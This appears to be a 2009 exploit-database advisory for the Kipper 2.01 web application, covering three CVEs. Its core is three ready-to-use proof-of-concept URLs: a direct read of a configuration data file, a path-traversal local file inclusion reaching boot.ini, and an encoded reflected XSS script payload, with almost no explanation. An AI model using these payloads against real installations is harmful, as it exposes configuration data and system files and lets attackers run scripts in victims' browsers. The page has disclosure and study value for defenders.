Kipper 2.01 (XSS/LFI/DD) Multiple Vulnerabilities

2009.03.08

Credit: RoMaNcYxHaCkEr

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2009-0763 | CVE-2009-0765 | CVE-2009-0767

CWE: CWE-79

# Kipper 2.01 Multiple Vulnes ( Remote Data Reading , Local File Include , Remote XSS )

# Download From : http://www.bookelves.com/kipper/files/kipper20.zip

- Found By : RoMaNcYxHaCkEr
- My Site : WwW.Sec-Code.CoM
- My Group : Security - Codes Group

# Exploit [1]:

- Remote Data Reading :

http://localhost/kipper20/job/config.data

# Exploit [2]:

- Local File Include :

http://localhost/kipper20/index.php?configfile=../../../../boot.ini

# Exploit [3]:

- Remote XSS :

http://localhost/kipper20/default.php?charm=%3E%20%3E%20ScRiPt%20%3EALERT%20529227151633%20%3B%20%2FScRiPt%3E#685828818694793444

# EOF ..

# rXh

# bEST wISHES

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Kipper 2.01 (XSS/LFI/DD) Multiple Vulnerabilities

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.